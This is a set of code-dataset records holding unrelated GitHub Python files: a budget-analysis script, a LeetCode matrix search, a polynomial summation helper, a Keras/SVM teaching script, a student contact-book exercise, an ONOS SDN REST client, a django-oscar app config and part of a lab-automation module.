empty line with whitespaces \n # (which is why using line == '\\n' would not comprehensively solve the issue).\n elif len(line.strip()) == 0:\n empty_lines.append(i)\n \n # Finally if there is still an issue, this whole line has formatting problems. So add it to our error_dict:\n else:\n error_dict[i] = [line, 'multiple issues']\n\n \n\n # Now we need to calculate the proper average. A dictionary isn't sorted inherently, but since we iterated new_key, all the key-value pairs match up\n # With the monthly progression of the data. 
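The average change computed just below this span is the mean of consecutive month-to-month differences, which telescopes to (last - first) / (n - 1); a tiny demo with made-up profit figures:

p_l = [100, 120, 90, 150]                      # hypothetical monthly profit/loss
deltas = [b - a for a, b in zip(p_l, p_l[1:])]
print(deltas)                                  # [20, -30, 60]
print(sum(deltas) / len(deltas))               # 16.666..., same as (150 - 100) / 3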
So step 1) grab all the values from the budget dict and turn them into a list of:\n    budget_tuples_list = list(budget.values())\n    p_l_list = []\n    deltas = []\n    #step 2) loop through all the tuples and grab the profit from each month, creating a list of all the SEQUENTIAL CHANGES:\n    for v in range(len(budget_tuples_list)):\n        budget_tup = budget_tuples_list[v]\n        p_l_list.append(budget_tup[1])\n        #step 3) build a list of all the month-to-month deltas in p/l:\n        if v >= 1:\n            deltas.append(p_l_list[v] - p_l_list[v-1])\n    average_deltas = (sum(deltas)/len(deltas))\n\n    # The following are print statements:\n\n    # returns empty lines to the user:\n    if empty_lines:\n        print(\"\\n\")\n        print(f\"Empty Line(s) #: {empty_lines}\\n\")\n    # Here is a fix for the ugly looking '\\n' on the tail of every error line:\n    \n    if error_dict.keys():\n        \n        \n        for i in error_dict:\n            nl_del = re.sub(r'\\n$','',error_dict[i][0]) # (this just gets rid of the \\n tail on the line)\n            print(f\"Error on line # {i}: {nl_del}' {error_dict[i][1]} ' caused an error\")\n        print(f\"File must include 1 header row in first line\")\n        print(f\"Date in first column (MON-YEAR, ex: JAN-2001)\")\n        print(f\"Profit/loss in 2nd column without $ (ex: -189000)\")\n        print(\"Please remove or reformat line(s), save the file, and retry\\n\")\n    \n    print(\"Financial Analysis\")\n    print(\"----------------------------\")\n    print(f\"Total Months: {new_key}\")\n    print(f\"Total: {profit_loss_total}\")\n    print(f\"Average Change: ${round(average_deltas,2)}\")\n    print(f\"Greatest Increase in Profits: {profit_loss_high[0]} (${profit_loss_high[1]})\")\n    print(f\"Greatest Decrease in Profits: {profit_loss_low[0]} (${profit_loss_low[1]})\")\n\n    if summary:\n        print(\"----------------------------\")\n        print(\"\\ncreating summary file\\n...\")\n        with open(\"summaryfile.txt\", \"w\") as summary_f:\n            summary_f.write(\"Financial Analysis\\n----------------------------\\n\")\n            summary_f.write(f\"Total Months: {new_key}\\n\")\n            summary_f.write(f\"Total: {profit_loss_total}\\n\")\n            summary_f.write(f\"Average Change: ${round(average_deltas,2)}\\n\")\n            summary_f.write(f\"Greatest Increase in Profits: {profit_loss_high[0]} (${profit_loss_high[1]})\\n\")\n            summary_f.write(f\"Greatest Decrease in Profits: {profit_loss_low[0]} (${profit_loss_low[1]})\\n\")\n        summary_f.close()\n        print(\"done\")\n    return None \n\ndef main():\n    # This is command-line parsing code.\n    # Make a list of command line arguments, omitting the [0] element\n    # which is the script itself.\n    args = sys.argv[1:]\n    if not args:\n        print(\"usage: [--summaryfile] file [file...]\")\n        sys.exit(1)\n\n    # Notice the summary flag and remove it from args if it is present.\n    summary = False\n    if args[0] == \"--summaryfile\":\n        summary = True\n        del args[0]\n    # Set the filename variable to the user input file\n    filename = args[0]\n    # Call the fin_analysis function\n    fin_analysis(filename,summary)\n    \n    \n\nif __name__ == '__main__':\n    main()","repo_name":"laramiedunlap/python_financial_summaries","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8152513946","text":"'''\nWrite an efficient algorithm that searches for a value in an m x n matrix.\nThis matrix has the following properties:\nIntegers in each row are sorted from left to right.\nThe first integer of each row is greater than the last integer of the previous row.\n\nExample 1:\nInput:\nmatrix = [\n    [1, 3, 5, 
7],\n    [10, 11, 16, 20],\n    [23, 30, 34, 50]\n]\ntarget = 3\nOutput: true\n\nExample 2:\nInput:\nmatrix = [\n    [1, 3, 5, 7],\n    [10, 11, 16, 20],\n    [23, 30, 34, 50]\n]\ntarget = 13\nOutput: false\n'''\nclass Solution:\n    def searchMatrix(self, matrix, target):\n        \"\"\"\n        :type matrix: List[List[int]]\n        :type target: int\n        :rtype: bool\n        \"\"\"\n        result = False\n        if matrix == [[]] or matrix == []:\n            return result\n\n        arrayCol = [a[0] for a in matrix]\n        left, right = self.binarySearch(arrayCol, target)\n        if left != right and left >= 0 and right <= len(matrix):\n            left, right = self.binarySearch(matrix[left], target)\n            if left == right:\n                result = True\n\n        return result\n\n    def binarySearch(self, nums, target):\n        if nums == []:\n            return 0, 0\n        left, right = 0, len(nums) - 1\n\n        while left <= right:\n            mid = left + (right - left) // 2\n            if target < nums[mid]:\n                right = mid - 1\n            elif target > nums[mid]:\n                left = mid + 1\n            else:\n                return mid, mid\n        return left - 1, right + 1\n\n    def searchMatrix1(self, matrix, target): # Is this method faster simply because it makes two fewer function calls?\n        \"\"\"\n        :type matrix: List[List[int]]\n        :type target: int\n        :rtype: bool\n        \"\"\"\n        if not matrix:\n            return False\n\n        m, n = len(matrix), len(matrix[0])\n        # Binary search over all elements of the 2D array at once, since values increase left-to-right and top-to-bottom\n        left, right = 0, m * n\n        while left < right:\n            mid = left + (right - left) // 2\n            if matrix[mid // n][mid % n] >= target:\n                right = mid\n            else:\n                left = mid + 1\n\n        return left < m * n and matrix[left // n][left % n] == target\n\n#print(Solution().binarySearch([1, 10, 23], 25))\nmatrix = [\n    [1, 3, 5, 7],\n    [10, 11, 16, 20],\n    [23, 30, 34, 50]\n]\nprint(Solution().searchMatrix(matrix, 50))\nprint(Solution().searchMatrix1(matrix, 50))","repo_name":"sasa233/myLeetcode","sub_path":"search-a-2d-matrix.py","file_name":"search-a-2d-matrix.py","file_ext":"py","file_size_in_byte":2420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23217980086","text":"fact=lambda x: x*fact(x-1)if x else 1\ncomb=lambda n,r: fact(n)//(fact(r)*fact(n-r))\n\nfrom fractions import Fraction as F\n\ndef add(a, b):\n    res = []\n    A, B = len(a), len(b)\n    for i in range(max(A, B)):\n        try: _a = a[i]\n        except: _a = 0\n        try: _b = b[i]\n        except: _b = 0\n        res.append(_a+_b)\n    return res\n\ndef mul(a, b):\n    return list(map(lambda v: v*b, a))\n\ndef S(m):\n    # return Polynomial f, that satisfies f(x) = 1^m+2^m+...+x^m\n    # ex) S(1) = x(x+1)/2 = 1+2+..+x\n    res = [[F(0), F(1)], [F(0), F(1, 2), F(1, 2)]]\n    for i in range(3,m+2):\n        a = [F(0)]\n        for j in range(len(res)): a = add(a, mul(res[j], F((-1)**(i-j)*comb(i,j), i)))\n        res.append(add(a, [F(0)]*i + [F(1, i)]))\n    return res[-1]\n\ndef stringify(poly):\n    res = []\n    first = True\n    for i in range(len(poly)-1, -1, -1):\n        coef = poly[i]\n        a, b = coef.numerator, coef.denominator\n        if a == 0: continue\n        sign = \"\" if first and a > 0 else \"-\" if first or a < 0 else \"+\"\n        x = f\"x^{i}\" if i > 1 else \"x\" if i == 1 else \"\"\n        _a = abs(a) if abs(a) != 1 else \"\"\n        res += [ f\"{sign} {_a}{x}{f'/{b}' if b != 1 else ''} \" ]\n        first = False\n    return ''.join(res).strip()\n","repo_name":"pl-Steve28-lq/ProgrammingLanguages","sub_path":"Python/SummationFunction.py","file_name":"SummationFunction.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"9893471181","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Shaon Bhatta Shuvo\n\"\"\"\n#Importing Libraries\nimport numpy as np\nimport pandas as pd\nimport 
matplotlib.pyplot as plt\nimport sklearn.datasets as skd\nfrom sklearn import preprocessing \nimport tensorflow.keras as tfk\nfrom sklearn.linear_model import LinearRegression \nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics \nfrom mlxtend.plotting import plot_decision_regions\n\n#Generating synthetic linear dataset \nX,y = skd.make_regression(n_samples=100, n_features=1, n_targets=1, bias=0.5, noise=5.5, random_state=42)\n\n#Reading dataset from csv file \n#dataframe = pd.read_csv(\"datasetName.csv\", header=None) #header=0 if first row/line is the header of the dataset\n#dataset = dataframe.values\n#Split into input (X) and output (Y) variables,\n#Let's say the dataset has n columns where the last column is the target value \n#therefore we have the first n-1 columns (indices 0 to n-2) as independent variables (inputs) and the (n-1)th column as the output since indexing starts from 0\n#X = dataset[:,0:n-1] # when range is [start:end] value is read from start to end-1 index \n#y = dataset[:,n-1] # here it is not a range but a specific index\n\n# Visualizing the synthetic dataset\nprint(\"\\nVisualizing the Synthetic Dataset\")\nplt.style.use(\"ggplot\")\nplt.scatter(X,y,color='red',edgecolors=\"green\")\nplt.title(\"Synthetic Dataset\")\nplt.xlabel(\"X\", fontsize=20)\nplt.ylabel(\"y\",rotation = 0, fontsize = 20)\nplt.show()\n\n#reshaping the y values into 2D matrix of 1 column\ny = y.reshape(-1,1) #if y is not an array then use, np.asanyarray(y).reshape(-1,1)\n# Equivalent code y = np.reshape(y,(-1,1))\n\n#Feature Scaling (Standardization : needs 2D array as input) \n#Here your data Z is rescaled such that μ = 0 and 𝛔 = 1, and is done through this formula: z= (Xi - μ)/𝛔\n#sc = preprocessing.StandardScaler()\n#X = sc.fit_transform(X)\n#y = sc.fit_transform(y)\n\n# Visualizing the synthetic dataset after standardization \n#print(\"\\nVisualizing the Synthetic Dataset after Standardization\")\n#plt.style.use(\"ggplot\")\n#plt.scatter(X,y,color='red',edgecolors=\"green\")\n#plt.title(\"Synthetic Dataset\")\n#plt.xlabel(\"X\", fontsize=20)\n#plt.ylabel(\"y\",rotation = 0, fontsize = 20)\n#plt.show()\n\n#Splitting the dataset into Training and Test set\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)\n\n#Creating the deep learning model with hyperbolic tangent activation function \n\n#A shape (5,2,8) means an array or tensor with 3 dimensions, containing 5 elements in the first dimension, \n#2 in the second and 8 in the third, totaling 5*2*8 = 80 elements or numbers.\n#What flows between layers are tensors. Tensors can be seen as matrices, with shapes.\n#In Keras, the input layer itself is not a layer, but a tensor. It's the starting tensor you send to the first \n#hidden layer. This tensor must have the same shape as your training data.\n#In our example the input data is one-dimensional and also has only one element (column). 
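# A quick check of the shape arithmetic above, kept commented out in the style of
# the other optional snippets in this file (demo_tensor is an illustrative name
# and is not used anywhere else in this script):
#demo_tensor = np.zeros((5, 2, 8))      # 3 dimensions: 5 x 2 x 8
#print(demo_tensor.shape)               # (5, 2, 8)
#print(demo_tensor.size)                # 5 * 2 * 8 = 80 elements in total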
\nmodel = tfk.Sequential([\n        tfk.Input(shape = (1,)), \n        tfk.layers.Dense(50, activation='tanh'), #first hidden layer\n        tfk.layers.Dense(100, activation='tanh'), #second hidden layer\n        tfk.layers.Dense(1,) #activation linear by default, also can add: activation ='linear' \n        ])\n#model Looks like: 1 input -> [50 units in layer1] ->[100 units in layer2] -> 1 output\n\n#Compiling the model with Stochastic Gradient Descent optimizer and MSE as the loss function\nmodel.compile(optimizer=tfk.optimizers.SGD(lr=0.001), loss='mean_squared_error', metrics=['mean_squared_error'])\n#Model's Summary\nmodel.summary()\n#Training the model \ntraining = model.fit(X_train,y_train, epochs = 50, batch_size =10)\n#Testing the model's performance \ny_pred = model.predict(X_test)\nmse = metrics.mean_squared_error(y_test,y_pred)\nprint(\"Testset Result: \\n---------------\")\nprint(\"MSE: \", mse)\n\n#Visualizing training loss values\nplt.plot(training.history['loss'], label='Training Loss')\nplt.title('Model Loss')\nplt.xlabel('Epoch')\nplt.ylabel('Loss')\nplt.legend()\n\n#Reshaping the matrices into arrays to pass the values into np.linspace() for 2D visualization. \nx_train_arr = np.asarray(X_train).reshape(-1)\ny_train_arr = np.asarray(y_train).reshape(-1)\nx_test_arr = np.asarray(X_test).reshape(-1)\ny_test_arr = np.asarray(y_test).reshape(-1)\n#Creating evenly spaced values for smooth visualization\nxp_train = np.linspace(x_train_arr.min(), x_train_arr.max())\nxp_test = np.linspace(x_test_arr.min(), x_test_arr.max())\n\n#Visualizing training and testing plots. \nfig, ax = plt.subplots (nrows=1, ncols=2, figsize=(8, 4))\nax[0].scatter (X_train, y_train, color='red', edgecolors='green', label='Synthetic Data Points')\nax[0].plot(xp_train,model.predict(xp_train.reshape(-1)),color='blue', label='Regression Line')\nax[0].set_title(\"NN Regression Plot (Training Set)\")\nax[0].set_xlabel(\"X_train\", fontsize=20)\nax[0].set_ylabel(\"y_train\", fontsize = 20)\nax[0].legend()\nax[1].scatter(X_test,y_test,color='red', edgecolors='green', label='Synthetic Data Points')\nax[1].plot(xp_test,model.predict(xp_test.reshape(-1)),color='blue',label='Regression Line')\nax[1].set_title(\"NN Regression Plot (Testing Set)\")\nax[1].set_xlabel(\"X_test\", fontsize=20)\nax[1].set_ylabel(\"y_test\", fontsize = 20)\nax[1].legend()\nplt.tight_layout()\nplt.show()\n\n#Creating Linear Regression Model\nlr_model = LinearRegression()\n#Training the model\nlr_model.fit(X_train,y_train)\n#Testing the model's performance\ny_pred_lr = lr_model.predict(X_test)\nmse = metrics.mean_squared_error(y_test,y_pred_lr)\nprint(\"MSE: \", mse)\n\n#Visualizing the Training and Test set performance of Linear Regression\nfig, ax = plt.subplots (nrows=1, ncols=2, figsize=(8, 4))\nax[0].scatter (X_train, y_train, color='red', edgecolors='green', label='Synthetic Data Points')\nax[0].plot(X_train,lr_model.predict(X_train),color='blue', label='Regression Line')\nax[0].set_title(\"Linear Regression Plot (Training Set)\")\nax[0].set_xlabel(\"X_train\", fontsize=20)\nax[0].set_ylabel(\"y_train\", fontsize = 20)\nax[0].legend()\nax[1].scatter(X_test,y_test,color='red', edgecolors='green', label='Synthetic Data Points')\nax[1].plot(X_test,lr_model.predict(X_test),color='blue',label='Regression Line')\nax[1].set_title(\"Linear Regression Plot (Testing Set)\")\nax[1].set_xlabel(\"X_test\", fontsize=20)\nax[1].set_ylabel(\"y_test\", fontsize = 20)\nax[1].legend()\nplt.tight_layout()\nplt.show()\n\n#Generating synthetic non-linear data to solve classification 
problem\nX,y = skd.make_circles(n_samples=100, shuffle=False, noise=None, random_state=None, factor=0.5)\n\n#The following classes will not be shaped as circles; parameters can be changed to make the data more non-linear\n#X, y = skd.make_classification(n_samples=100, n_features=2, n_redundant=0, n_informative=2,\n#                           n_clusters_per_class=1,class_sep=0.5,flip_y=0.2, random_state=1,shuffle=False)\n\n#Finding and counting unique elements. \nunique_elements, counts_elements = np.unique(y, return_counts=True)\nprint(\"Frequency of unique class of the dataset:\")\nprint(np.asarray((unique_elements, counts_elements)))\n\n#Visualizing the synthetic dataset of Class 0 and Class 1: \nplt.plot(X[:, 0][y == 0], X[:, 1][y == 0], 'g^', label='Class: 0')\nplt.plot(X[:, 0][y == 1], X[:, 1][y == 1], 'ro' , label=\"Class: 1\")\nplt.title(\"Visualizing the synthetic dataset of class 1 and 0\")\nplt.xlabel(\"X1\")\nplt.ylabel(\"X2\")\nplt.legend()\nplt.show() \n\n#Splitting the dataset into train and test set\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)\n\nprint(\"Frequency of unique class of elements in the test set:\")\nunique_elements_test, count_elements_test=np.unique(y_test, return_counts=True)\nprint(unique_elements_test, count_elements_test)\n\n#Creating validation set by copying last 10 elements from the training set\nX_val = X_train[70:]\ny_val = y_train[70:]\n#Removing the validation set (last 10 elements) from training set\nX_train = X_train[:70]\ny_train = y_train[:70]\n\n#Creating the deep learning model (let's try a different approach; the same approach shown earlier could also be used) \nmodel = tfk.Sequential()\nmodel.add(tfk.layers.Dense(50,input_shape=(2,), activation='relu')) #First Hidden Layer\nmodel.add(tfk.layers.Dense(100, activation='relu')) #Second Hidden Layer\nmodel.add(tfk.layers.Dense(1, activation='sigmoid')) #Output Layer\n\n#The model can be created using the following approach as well\n#input_units = tfk.Input(shape=(2,))\n#hidden_layer1 = tfk.layers.Dense(100, activation ='relu')((input_units))\n#hidden_layer2 = tfk.layers.Dense(50, activation ='relu')(hidden_layer1)\n#prediction = tfk.layers.Dense(1, activation ='sigmoid')(hidden_layer2)\n#model = tfk.models.Model(inputs=input_units, outputs=prediction)\n\n#model Looks like: 2 input -> [50 units in layer1] ->[100 units in layer2] -> 1 output\n\n# Compiling the model for binary classification # Use loss = categorical_crossentropy for multiclass prediction (see the commented sketch below). 
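# A minimal sketch of the multiclass variant mentioned above, kept commented out
# like the other alternatives in this file. It assumes the labels would be one-hot
# encoded and the output layer widened to one unit per class; n_classes is a
# hypothetical name that is not defined anywhere in this script:
#model.add(tfk.layers.Dense(n_classes, activation='softmax'))
#model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])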
\nmodel.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy']) \n#Model's Summary\nmodel.summary()\n\n#Training the model \ntraining = model.fit(X_train,y_train, epochs = 50, batch_size =10, validation_data =(X_val,y_val))\n\n#Visualizing the Training and Validation Sets Loss and Accuracy\nfig, axes = plt.subplots(nrows=1, ncols=2, figsize=(8,4))\n#Plot training and validation accuracy values\n#axes[0].set_ylim(0,1) #if we want to limit axis in certain range\naxes[0].plot(training.history['accuracy'], label='Train')\naxes[0].plot(training.history['val_accuracy'], label='Validation')\naxes[0].set_title('Model Accuracy')\naxes[0].set_xlabel('Epoch')\naxes[0].set_ylabel('Accuracy')\naxes[0].legend()\n#Plot training and validation loss values\n#axes[1].set_ylim(0,1)\naxes[1].plot(training.history['loss'], label='Train')\naxes[1].plot(training.history['val_loss'], label='Validation')\naxes[1].set_title('Model Loss')\naxes[1].set_xlabel('Epoch')\naxes[1].set_ylabel('Loss')\naxes[1].legend()\nplt.tight_layout()\nplt.show()\n\n# Evaluating the performance on the Test set \ntest_loss_accuracy = model.evaluate(X_test, y_test, verbose=2)\n\n# Visualising the Training and Test set plot decision area\nfig, axes = plt.subplots (nrows=1, ncols=2, figsize=(8, 4))\nfig1 = plot_decision_regions(X_train, y_train, clf=model, ax=axes[0], legend=0)\nfig2 = plot_decision_regions(X_test, y_test, clf=model, ax=axes[1], legend=0)\naxes[0].set_title('NN Plot Decision Region (Training set)')\naxes[0].set_xlabel('x1')\naxes[0].set_ylabel('x2')\naxes[1].set_title('NN Plot Decision Region (Test set)')\naxes[1].set_xlabel('x1')\naxes[1].set_ylabel('x2')\n\nhandles, labels = fig1.get_legend_handles_labels()\nfig1.legend(handles, \n          ['class 0', 'class 1'])\nfig2.legend(handles, \n          ['class 0', 'class 1'])\n\nplt.tight_layout()\nplt.show()\n\n# Predicting the Test set results\ny_pred = model.predict(X_test)\n# Converting the predicted result into the desired class label\n# Sigmoid produces outputs between 0 and 1. Therefore, the decision boundary for sigmoid is 0.5\nfor i in range(0, len(y_pred)):\n    if(y_pred[i]>0.5):\n        y_pred[i] = 1\n    else:\n        y_pred[i] = 0\n\n# Generating confusion matrix and detailed classification report\ncm = metrics.confusion_matrix(y_test,y_pred)\nprint(\"Confusion Matrix for Neural Network Model:\\n \",cm)\nprint( \"{0}\".format(metrics.classification_report(y_test,y_pred)))\n# Generating accuracy in %, \n# Similarly precision_score and recall_score can be used to generate precision and recall separately\naccuracy_test = metrics.accuracy_score(y_test,y_pred)*100\nprint('Accuracy:%.2f' % accuracy_test,\"%\")\n\n# Using non-linear SVM classifier; use kernel='linear' for a linear classifier (see the commented sketch below). 
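# A minimal sketch of the linear variant mentioned above, using the svm module
# imported just below. It is kept commented out because a linear kernel draws a
# straight decision boundary, which is expected to do poorly on the
# concentric-circles data generated earlier:
#linear_classifier = svm.SVC(kernel='linear')
#linear_classifier.fit(X_train, y_train)
#y_pred_linear = linear_classifier.predict(X_test)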
\nfrom sklearn import svm\nclassifier = svm.SVC(kernel='rbf') #rbf = 'radial basis function' for non-linear classification\nclassifier.fit(X_train,y_train)\n\n# Predicting Test set result\ny_pred = classifier.predict(X_test)\n\n# Generating confusion matrix and detailed classification report\ncm = metrics.confusion_matrix(y_test,y_pred)\nprint(\"Confusion Matrix for SVM Classifier:\\n \",cm)\nprint( \"{0}\".format(metrics.classification_report(y_test,y_pred)))\n# Generating accuracy in %, \n# Similarly precision_score and recall_score can be used to generate precision and recall separately\naccuracy_test = metrics.accuracy_score(y_test,y_pred)*100\nprint('Accuracy:%.2f' % accuracy_test,\"%\")\n\n# Visualising the Training and Test set plot decision area\nfig, axes = plt.subplots (nrows=1, ncols=2, figsize=(8, 4))\nfig1 = plot_decision_regions(X_train, y_train, clf=classifier, ax=axes[0], legend=0)\nfig2 = plot_decision_regions(X_test, y_test, clf=classifier, ax=axes[1], legend=0)\naxes[0].set_title('SVM Plot Decision Region (Training set)')\naxes[0].set_xlabel('x1')\naxes[0].set_ylabel('x2')\naxes[1].set_title('SVM Plot Decision Region (Test set)')\naxes[1].set_xlabel('x1')\naxes[1].set_ylabel('x2')\nhandles, labels = fig1.get_legend_handles_labels()\nfig1.legend(handles, \n          ['class 0', 'class 1'])\nfig2.legend(handles, \n          ['class 0', 'class 1'])\n\nplt.tight_layout()\nplt.show()\n","repo_name":"parth-patel09/Deep-Learning-Workshop","sub_path":"WorshopDL_(Part1).py","file_name":"WorshopDL_(Part1).py","file_ext":"py","file_size_in_byte":12984,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"10100846067","text":"# Agenda (contact book) with: registration and reading\nagenda = {}\nwhile True:\n    print(\"1 = Cadastro\\n2 = Leitura\\n3 = Sair\")\n    opção = int(input(\"O que você deseja fazer? 
\"))\n if opção == 1: \n nome = input(\"Nome:\")\n idade = int(input(\"Idade: \"))\n cpf = int(input(\"Digite o apenas os dígitos do cpf: \"))\n agenda[nome] = idade, cpf\n print(\"Usuário cadastrado!\")\n elif opção == 2:\n menores = {}\n for n, i in agenda:\n if i < 18:\n menores[n]\n for n in menores.keys():\n agenda.pop(n)\n print(f\"Maiores de idade: {agenda}\\n Menores de idade: {menores}\")\n elif opção == 3:\n print(\"Fim do programa\")\n break\n","repo_name":"Caillouren/Projeto-FlyFood","sub_path":"Exercícios/Exercício Agenda.py","file_name":"Exercício Agenda.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42339245057","text":"import json\nimport requests\nfrom requests.auth import HTTPBasicAuth\n\n\nclass OnosRestAPI():\n\n def __init__(self):\n self.controller_ip = '192.168.139.137.5'\n self.api_url = 'http://%s:8181/onos/v1' % self.controller_ip\n self.credentials = ('onos', 'rocks')\n\n def get_devices(self):\n \"Returns network devices file\"\n\n url = self.api_url + '/devices'\n response = requests.get(url, auth=self.credentials)\n return response.json()\n\n def get_hosts(self):\n \"Returns network devices file\"\n\n url = self.api_url + '/hosts'\n response = requests.get(url, auth=self.credentials)\n return response.json()\n\n def get_network_config(self):\n \"Returns network configuration file\" \n\n url = self.api_url + '/network/configuration'\n response = requests.get(url, auth=self.credentials)\n # return json.dumps(response.json(), indent=4, sort_keys=False)\n return response.json()\n\n def push_network_config(self, cfg_path):\n \"Send network configuration to controller\"\n\n url = self.api_url + '/network/configuration'\n config_file = json.dumps(self.load_json(cfg_path))\n\n response = requests.post(url, data=config_file, \n headers={\"Content-Type\": \"application/json, Accept: application/json\"})\n\n def load_json(self, path):\n \"Loads json from file\"\n with open(path) as f:\n return json.load(f)\n\n def get_device_id(self, devices):\n for device in devices['devices']:\n print(device['available'])\n\n def del_device(self, device_id):\n \"Delete device with given id\"\n url = self.api_url + '/devices/' + device_id\n response = requests.delete(url, auth=self.credentials)\n print(response)\n \n def delete_unavailable_devices(self):\n devices = self.get_devices()\n for device in devices['devices']:\n if device['available'] == False:\n print('Deleting device with id: ' + device['id'])\n self.del_device(device['id'])\n\n def delete_all_devices(self):\n devices = self.get_devices()\n for device in devices['devices']:\n print('Deleting device with id: ' + device['id'])\n self.del_device(device['id'])\n\n def get_all_flows(self):\n url = self.api_url + '/flows'\n response = requests.get(url, auth=self.credentials)\n return response.json()\n\n def del_all_flows(self):\n \"Doesn't work - to be finnished\"\n url = url = self.api_url + '/flows'\n flows = self.get_all_flows()\n response = requests.delete(url, data=flows, auth=self.credentials, headers={\"Content-Type\": \"application/json\"})\n print(response)\n\n \n\n\n\n\n\n\ncontroller = OnosRestAPI()\ncontroller.delete_unavailable_devices()\n# print(json.dumps(controller.get_all_flows(), indent=4))\n# print(json.dumps(controller.get_devices(), indent=4))\n# print(json.dumps(controller.get_hosts(), 
indent=4))\n\n","repo_name":"Suazi/SDN","sub_path":"rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6264462215","text":"from django.urls import re_path\n\nfrom oscar.apps.catalogue import apps\n\n\nclass CatalogueConfig(apps.CatalogueConfig):\n    name = \"tests._site.apps.catalogue\"\n\n    def get_urls(self):\n        from .views import ParentProductDetailView\n\n        urls = super().get_urls()\n        urls += [\n            re_path(\n                r\"^parent/(?P<product_slug>[\\w-]*)_(?P<pk>\\d+)/$\",\n                ParentProductDetailView.as_view(),\n                name=\"parent_detail\",\n            )\n        ]\n        return self.post_process_urls(urls)\n","repo_name":"django-oscar/django-oscar","sub_path":"tests/_site/apps/catalogue/apps.py","file_name":"apps.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":5941,"dataset":"github-code","pt":"37"} +{"seq_id":"29393512621","text":"# Flab\r\n# Distributed under GNU GPL v3\r\n# Author: Nicholas Jose\r\n\r\n\"\"\"\r\nThe Flab module contains the Flab and FlabNamespace classes, which are used for sharing of attributes,\r\nmethods, variables and other objects\r\n\"\"\"\r\n\r\nfrom flab import TaskManager, UiManager, DeviceManager\r\nimport time\r\nimport os\r\nimport sys\r\nimport inspect\r\n\r\n\r\nclass Flab(DeviceManager.DeviceManager, TaskManager.TaskManager, UiManager.UiManager):\r\n    \"\"\"Flab inherits DeviceManager, TaskManager and UiManager and contains dictionaries for\r\n    devices, tasks, vars, uis and bots.\r\n    \"\"\"\r\n    version = '2.0.7'\r\n    modules = {} # module dictionary\r\n\r\n    def __init__(self, ui_queue=None, flab_queue=None, print_status=True):\r\n        \"\"\"\r\n        Constructs the Flab object, containing empty dictionaries\r\n\r\n        Flab objects can be constructed with two queues for exchanging information between processes.\r\n\r\n        :param ui_queue: queue object that passes information to UI processes, defaults to None\r\n        :type ui_queue: multiprocessing.Queue(,queue.Queue)\r\n\r\n        :param flab_queue: queue object that passes information to flab processes, defaults to None\r\n        :type flab_queue: multiprocessing.Queue(,queue.Queue)\r\n\r\n        :param print_status: a boolean indicating if output should be sent to the command prompt, defaults to True\r\n\r\n        :returns: None\r\n        \"\"\"\r\n\r\n        self.ui_queue = ui_queue\r\n        self.flab_queue = flab_queue\r\n        self.devices = {} # device dictionary\r\n        self.tasks = {} # task dictionary\r\n        self.vars = {} # variable dictionary\r\n        self.uis = {} # UI dictionary\r\n        self.bots = {} # bot dictionary\r\n        self.print_status = print_status # True if outputs are to be displayed through the python console\r\n        self.is_running = True # True if flab has been initiated within a running program\r\n\r\n    def add_var(self, value, variable_name) -> None:\r\n        \"\"\"adds a variable with a given value to the variable dictionary\r\n\r\n        :param value: value of the variable\r\n        :type value: numbers, strings, lists, objects, etc.\r\n\r\n        :param variable_name: the name of the variable\r\n        :type variable_name: str\r\n\r\n        :return: None\r\n\r\n        Do not use devices, tasks, bots or uis in the variable dictionary.\r\n        Avoid nested dictionaries and complex objects.\r\n\r\n        \"\"\"\r\n\r\n        try:\r\n            self.vars[variable_name] = value\r\n        except Exception as e:\r\n            self.display('Error when adding to variable dictionary')\r\n            self.display(e)\r\n            # raise Exception('Error in Flab.add_var')\r\n        finally:\r\n            pass\r\n\r\n    def display(self, 
object) -> None:\r\n \"\"\"\r\n Displays an object by printing to the command prompt and/or passing to ui_queue\r\n\r\n :param object: an object\r\n\r\n :returns: None\r\n \"\"\"\r\n try:\r\n if self.print_status:\r\n print(object)\r\n if self.ui_queue is not None:\r\n self.ui_queue.put(object)\r\n except Exception as e:\r\n if self.print_status:\r\n print('Error in Flab.display')\r\n print(e)\r\n if self.ui_queue is not None:\r\n self.ui_queue.put('Error in Flab.display')\r\n self.ui_queue.put(e)\r\n finally:\r\n pass\r\n\r\n #\r\n def message(self, text) -> None:\r\n \"\"\"\r\n Displays a message. For example, message('HelloWorld') leads to the\r\n display of \"message: Hello World\"\r\n\r\n :param text: whatever you want to send a message about\r\n :type text: str\r\n\r\n :returns: None\r\n \"\"\"\r\n\r\n try:\r\n s = 'message: ' + text\r\n self.display(s)\r\n except Exception as e:\r\n self.display('Error in Flab.message')\r\n self.display(e)\r\n finally:\r\n pass\r\n\r\n # Actions to take when closing flab\r\n def close_flab(self) -> None:\r\n \"\"\"\r\n Ends all running processes and tasks within a Flab object\r\n\r\n :return: None\r\n \"\"\"\r\n try:\r\n # stop all running tasks\r\n self.display('stopping running tasks')\r\n self.stop_all_tasks()\r\n while self.get_running_task_names():\r\n time.sleep(1)\r\n self.is_running = False\r\n if self.flab_queue is not None:\r\n self.display('closing flab process')\r\n self.flab_queue.put('close')\r\n if self.ui_queue is not None:\r\n self.display('closing ui process')\r\n self.ui_queue.put('close')\r\n except Exception as e:\r\n self.display('Error in Flab.close_flab')\r\n self.display(e)\r\n finally:\r\n return 0\r\n\r\n def close_queues(self) -> 